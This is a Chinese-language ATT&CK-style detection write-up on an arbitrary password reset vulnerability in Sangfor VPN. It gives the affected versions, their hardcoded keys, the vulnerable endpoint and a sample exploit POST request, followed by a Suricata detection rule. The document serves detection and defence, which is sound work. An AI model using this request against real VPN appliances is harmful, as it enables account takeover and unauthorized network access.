T1133-001-深信服VPN任意密码重置

来自ATT&CK的描述

攻击者可能会利用面向外部的VPN服务来实现最初访问或网络内持久化。VPN服务使用户可以从外部位置连接到内部企业网络资源。

通常需要有效帐户才能使用该服务，这可以通过凭据篡改或在攻陷企业网络之后从用户那里获取凭据来获得。（引自：Volexity Virtual Private Keylogging） 在攻击者的操作过程中，对远程服务的访问可用作冗余或持久访问机制。

测试案例

已知影响范围M7.6.6R1、M7.6.1

检测日志

HTTP

测试复现

M7.6.6R1 key 为20181118

M7.6.1 key 为 20100720

https://xxx/por/changepwd.csp

测试留痕

POST /por/changepwd.csp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN

检测规则/思路

Suricata规则

alert http any any -> any any (msg:"深信服VPN任意密码重置";flow:established,to_server;content:"POST";http_method;content:"/por/changepwd.csp";http_uri;content:"sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN";http_client_body;reference:url,www.hacking8.com;classtype:web-application-attck;sid:3002012;rev:1;)

建议

流量+安全设备比较容易检测到此攻击行为。

参考推荐

MITRE-ATT&CK-T1133-001

https://attack.mitre.org/techniques/T1133/001